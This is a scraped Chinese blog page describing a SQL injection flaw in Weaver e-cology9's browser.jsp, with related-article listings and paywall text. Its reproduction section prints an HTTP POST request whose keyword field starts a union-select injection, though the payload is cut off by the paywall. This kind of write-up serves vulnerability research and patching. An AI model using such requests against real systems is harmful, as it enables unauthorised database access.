泛微e-cology9 browser.jsp SQL注入漏洞

最新推荐文章于 2024-11-07 22:12:00 发布
最新推荐文章于 2024-11-07 22:12:00 发布
阅读量1.9k 收藏 1
点赞数
CC 4.0 BY-SA版权
分类专栏: sql注入 web安全 框架漏洞 文章标签: 渗透测试 sql 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Myu_wzy/article/details/129672457
本文介绍了泛微e-cology9的browser.jsp存在的SQL注入漏洞,详细阐述了漏洞的成因、危害及复现步骤,包括如何构建数据包、使用sqlmap自动化注入。同时,提出了修复建议,即升级到10.56及以上版本,并提供了相关扩展知识链接。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

泛微e-cology9 browser.jsp SQL注入漏洞

漏洞描述(介绍、成因)

泛微e-cology9中存在SQL注入漏洞,经身份认证的远程攻击者即可利用此漏洞获取数据库敏感信息,进一步利用可能导致目标系统被控。

漏洞危害

恶意攻击者可能会利用SQL注入漏洞获取、篡改数据库数据,执行系统命令,甚至获取系统控制权限。

适用场景

泛微e-cology9 <= 10.55

漏洞复现过程(有条件的自行搭建环境)

1、构建数据包
POST /mobile/plugin/browser.jsp HTTP/1.1
Host: xxx
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-N976N Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/74.0.3729.136 Mobile Safari/537.36 E-Mobile7/7.0.41.20201208 Language/zh Qiyuesuo/physicalSDK
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: xxx
Connection: close
Content-Length: 574

isDis=1&browserTypeId=269&keyword=a%' union sel
最低0.47元/天 解锁文章

200万优质内容无限畅学
漏洞复现】OA E-Cology V9 browser.jsp SQL注入漏洞复现及利用(CNVD-2023-12632)
李火火的安全圈
05-10 3389
协同管理应用平台e-cology是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台。新一代移动办公平台E-Cology不仅组织提供了一体化的协同工作平台,将组织事务逐渐实现全程电子化,改变传统纸质文件,实体签章的方式,OA E-Cology平台browser.jsp处存在SQL注入漏洞,攻击者通过漏洞可以获取服务器数据库权限。
漏洞复现】OA E-Cology Browser SQL注入漏洞
晚风不及你
05-16 944
OA E-Cology browser存在SQL注入漏洞,允许攻击者非法访问和操作数据库,可能导致数据泄露、篡改、删除,甚至控制整个服务器。
漏洞复现 OA E-Cology V9 browser.jsp SQL注入漏洞
qq_50854662的博客
03-20 8617
漏洞复现 OA E-Cology V9 browser.jsp SQL注入漏洞
e-cology9 SQL注入漏洞复现(QVD-2023-5012)
ZL_1618的博客
03-09 2532
协同管理应用平台e-cology是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台。e-cology9中存在SQL注入漏洞,未经身份认证的远程攻击者即可利用此漏洞获取数据库敏感信息,进一步利用可能导致目标系统被控。
【高危】 e-cology <10.57 存在 SQL注入漏洞(POC)(MPS-ndqt-0im5)
murphysec的博客
04-28 1671
协同管理应用平台(e-cology)是一套企业大型协同管理平台。 e-cology 受影响版本存在SQL注入漏洞,未经授权的远程攻击者可通过发送特殊的HTTP请求来获取数据库的敏感信息。
e-cology9 SQL注入漏洞复现【QVD-2023-5012】
holyxp的博客
07-22 922
协同管理应用平台e-cology是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台。​ e-cology9中存在SQL注入漏洞,未经身份认证的远程攻击者即可利用此漏洞获取数据库敏感信息,进一步利用可能导致目标系统被控。
漏洞复现】 e-cology 前台SQL注入漏洞
2301_79099363的博客
07-12 2490
漏洞复现】 e-cology 前台SQL注入漏洞
漏洞复现】OA E-Cology SignatureDownLoad SQL注入漏洞
晚风不及你
05-15 811
OA E-Cology SignatureDownLoad存在SQL注入漏洞,允许攻击者非法访问和操作数据库,可能导致数据泄露、篡改、删除,甚至控制整个服务器。
e-cology SQL注入漏洞复现
07-12 2388
此文章仅用于技术交流,严禁用于对外发起恶意攻击!!!
Jsp File Browser
01-12
国外著名的开源JSP文件管理器,历史悠久,功能强大,功能除了常用的建立文件夹,复制,删除文件等等之外,还包括在线浏览多种格式文件(JPG,FLASH,MP3...),在线编辑文本,单个或多文件下载为一个ZIP,调用服务器CMD,还提供丰富的配置参数.而所有这些只需一个JSP文件,功能实在强大,所以到现在还有很多国内的JSPer参考这个做成自己的JSP文件管理器,这里我也上传了供大家下载,官方地址是:http://www.vonloesch.de/jspbrowser.html可以下载原版,喜欢的可以到官方地址了解更多.支持开源但顺便鄙视到处改一下,而且还出错就说是自己做的人...
jspbrowser中文
01-07
jspBrowser中文乱码解决,多个地方编码设置
jsp File Browser中文版
11-18
修改于国外著名的开源JSP文件管理器,原版不支持中文,本人修改后支持:1、中文文件名、文件夹名的显示、修改、删除、创建;2、顶部添加主页、刷新功能链接;3、增加图片文件的预览功能(非IE浏览器需拖拽到新标签页预览)。 注:1、转载请注明本人原出处;2、如有任何疑问请联系本人QQ313783837(添加请注明jspFileBrowser中文版);3、喜欢原版的可以下载原版,官方地址是:http://www.vonloesch.de/jspbrowser.html
E-Cology CheckServer.jspSQL注入漏洞(QVD-2023-9849) 复现
huangyongkang666的博客
11-18 3874
E-Cology CheckServer.jspSQL注入漏洞(QVD-2023-9849) 复现
OA e-cology9 存在 sql 注入
nnn2188185的博客
04-29 1665
信公众号搜索:南风漏洞复现文库该文章 南风漏洞复现文库 公众号首发 E-Cology9 协同办公系统是一套基于 JSPSQL Server 数据库的 OA 系统,包括知识文档管理、人力资源管理、客户关系管理、项目管理、财务管理、工作流程管理、数据中心等打造协同高效的企业管理环境,突破企业人、财、物、信息、流程等各种资源之间的屏障,并将集团各企业、企业各部门、各分支机构、以及企业与外部的供应商、分销商、客户及其他合作伙伴等整合在一个统一的平台上,使企业变成一个电子化的内外部协同工作的组织。
CNVD-2023-12632 e-cology9 sql注入 附poc
Innocence_0的博客
02-04 1339
回复关键字:230317领批量检测脚本。声明:文中涉及到的技术和工具,仅供学习使用,禁止从事任何非法活动,如因此造成的直接或间接损失,均由使用者自行承担责任。
E-Cology WorkflowServiceXml SQL注入漏洞复现(QVD-2024-26136)
0xSec
07-12 2515
2024年7月,官方发布了新补丁,修复了一处SQL注入漏洞。经分析,攻击者无需认证即可利用该漏洞,建议受影响的客户尽快修复漏洞
E-Cology9 FileDownloadLocation 身份认证绕过导致SQL注入漏洞复现
最新发布
0xSec
11-07 1161
由于E-Cology9 /weaver/FileDownloadLocation接口未对用户传入的数据进行严格的校验和过滤,导致攻击者利用多层编码的方式绕过身份认证进行SQL注入,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
oa e-cology v9 browser.jsp sql注入漏洞
09-15
OA E-Cology V9是一款常用的企业办公自动化系统,该系统的browser.jsp页面存在SQL注入漏洞SQL注入是一种常见的网络攻击技术,攻击者可以通过构造恶意的SQL语句来绕过系统的认证和授权机制,进而获取敏感数据或者对系统进行非法操作。 OA E-Cology V9中的browser.jsp页面是用于显示OA系统中的个人文件夹和公共文件夹。攻击者可以在该页面中输入恶意的SQL语句,通过执行这些恶意SQL语句,攻击者可以获取到不应该被访问的数据,比如其他用户的文件,甚至可以对数据库进行修改和损坏。 为了防止SQL注入漏洞的利用,可以采取以下措施: 1. 输入过滤和验证:在服务器端对用户输入的数据进行过滤和验证,去除或转义可能包含恶意SQL代码的字符,确保只接受合法的输入。 2. 使用参数化查询:尽量使用参数化查询代替拼接SQL语句的方式,参数化查询可以预编译SQL语句,避免在拼接时引入恶意代码。 3. 限制数据库用户的权限:对数据库用户进行权限控制,确保每个用户只拥有最小必要的权限,减少攻击者利用SQL注入漏洞进行非法操作的机会。 4. 及时更新和修补漏洞:及时跟进厂商的安全通告并安装最新的补丁程序,确保系统始终处于最新的安全状态。 综上所述,OA E-Cology V9中的browser.jsp页面存在SQL注入漏洞,但通过合理的安全措施和注意事项,我们可以有效地减少该漏洞被利用的风险。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值